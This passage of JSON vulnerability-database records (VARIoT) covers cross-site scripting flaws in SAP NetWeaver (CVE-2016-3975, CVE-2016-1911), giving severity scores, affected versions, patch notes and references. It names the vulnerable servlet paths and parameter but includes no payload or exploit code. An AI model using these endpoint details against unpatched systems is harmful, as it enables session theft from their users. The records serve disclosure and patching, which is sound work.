"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:10:31.203000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/07/11/sap-security-patch-day-july-2017/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2459319"
}
],
"sources": [
{
"db": "BID",
"id": "99529"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "99529"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "BID",
"id": "99529"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "BID",
"id": "99529"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "99529"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Data Orchestration Engine Unspecified Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "99529"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "99529"
}
],
"trust": 0.3
}
}
var-201604-0103
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 allows remote attackers to inject arbitrary web script or HTML via the navigationTarget parameter to irj/servlet/prt/portal/prteventname/XXX/prtroot/com.sapportals.navigation.testComponent.NavigationURLTester, aka SAP Security Note 2238375. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SAP NetWeaver 7.4 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201604-0103",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver application server java",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.1 to 7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"db": "NVD",
"id": "CVE-2016-3975"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.50",
"versionStartIncluding": "7.10",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3975"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vahagn Vardanyan (ERPScan)",
"sources": [
{
"db": "BID",
"id": "85945"
}
],
"trust": 0.3
},
"cve": "CVE-2016-3975",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-3975",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2016-3975",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-3975",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201604-096",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"db": "NVD",
"id": "CVE-2016-3975"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 allows remote attackers to inject arbitrary web script or HTML via the navigationTarget parameter to irj/servlet/prt/portal/prteventname/XXX/prtroot/com.sapportals.navigation.testComponent.NavigationURLTester, aka SAP Security Note 2238375. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. \nSAP NetWeaver 7.4 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3975"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"db": "BID",
"id": "85945"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-3975",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "137529",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002002",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201604-096",
"trust": 0.6
},
{
"db": "BID",
"id": "85945",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "85945"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"db": "NVD",
"id": "CVE-2016-3975"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
]
},
"id": "VAR-201604-0103",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:48:47.878000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2238375",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP NetWeaver AS Java Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60827"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"db": "NVD",
"id": "CVE-2016-3975"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/137529/sap-netweaver-as-java-7.5-cross-site-scripting.html"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2016/jun/42"
},
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-16-014-sap-netweaver-7-4-navigationurltester/"
},
{
"trust": 1.6,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-march-2016-review/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3975"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3975"
},
{
"trust": 0.8,
"url": "https://erpscan.com/advisories/erpscan-16-014-sap-netweaver-7-4-navigationurltester/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"db": "NVD",
"id": "CVE-2016-3975"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "85945"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"db": "NVD",
"id": "CVE-2016-3975"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-08T00:00:00",
"db": "BID",
"id": "85945"
},
{
"date": "2016-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"date": "2016-04-07T19:59:06.087000",
"db": "NVD",
"id": "CVE-2016-3975"
},
{
"date": "2016-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-08T00:00:00",
"db": "BID",
"id": "85945"
},
{
"date": "2016-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002002"
},
{
"date": "2021-04-20T18:58:12.380000",
"db": "NVD",
"id": "CVE-2016-3975"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS Java Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002002"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-096"
}
],
"trust": 0.6
}
}
var-201601-0535
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to the (1) Runtime Workbench (RWB) or (2) Pmitest servlet in the Process Monitoring Infrastructure (PMI), aka SAP Security Notes 2206793 and 2234918. SAP NetWeaver Contains a cross-site scripting vulnerability. Vendors have confirmed this vulnerability SAP Security Note 2206793 and 2234918 It is released as.By any third party Web Script or HTML May be inserted. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201601-0535",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.4"
}
],
"sources": [
{
"db": "BID",
"id": "80909"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"db": "NVD",
"id": "CVE-2016-1911"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1911"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ERPSCAN",
"sources": [
{
"db": "BID",
"id": "80909"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1911",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-1911",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-1911",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-343",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"db": "NVD",
"id": "CVE-2016-1911"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to the (1) Runtime Workbench (RWB) or (2) Pmitest servlet in the Process Monitoring Infrastructure (PMI), aka SAP Security Notes 2206793 and 2234918. SAP NetWeaver Contains a cross-site scripting vulnerability. Vendors have confirmed this vulnerability SAP Security Note 2206793 and 2234918 It is released as.By any third party Web Script or HTML May be inserted. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1911"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"db": "BID",
"id": "80909"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1911",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001074",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201601-343",
"trust": 0.6
},
{
"db": "BID",
"id": "80909",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "80909"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"db": "NVD",
"id": "CVE-2016-1911"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
]
},
"id": "VAR-201601-0535",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:48:48.337000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Notes January 2016 - Review (2206793/2234918)",
"trust": 0.8,
"url": "http://scn.sap.com/community/security/blog/2016/01/12/sap-security-notes-january-2016-review"
},
{
"title": "SAP NetWeaver Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=59661"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"db": "NVD",
"id": "CVE-2016-1911"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-16-001-xss-sap-netweaver-7-4-mdt-servlet/"
},
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-16-004-sap-netweaver-7-4-pmitest-servlet-xss/"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2016/apr/58"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2016/apr/64"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-16-001-xss-sap-netweaver-7-4-mdt-servlet/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-16-004-sap-netweaver-7-4-pmitest-servlet-xss/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"trust": 0.9,
"url": "http://erpscan.com/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1911"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1911"
},
{
"trust": 0.3,
"url": "http://scn.sap.com/community/security/blog/2016/01/12/sap-security-patch-day--january-2016"
}
],
"sources": [
{
"db": "BID",
"id": "80909"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"db": "NVD",
"id": "CVE-2016-1911"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "80909"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"db": "NVD",
"id": "CVE-2016-1911"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-12T00:00:00",
"db": "BID",
"id": "80909"
},
{
"date": "2016-01-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"date": "2016-01-15T20:59:02.957000",
"db": "NVD",
"id": "CVE-2016-1911"
},
{
"date": "2016-01-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-12T00:00:00",
"db": "BID",
"id": "80909"
},
{
"date": "2016-01-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001074"
},
{
"date": "2018-12-10T19:29:15.110000",
"db": "NVD",
"id": "CVE-2016-1911"
},
{
"date": "2016-01-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Vulnerable to cross-site scripting",
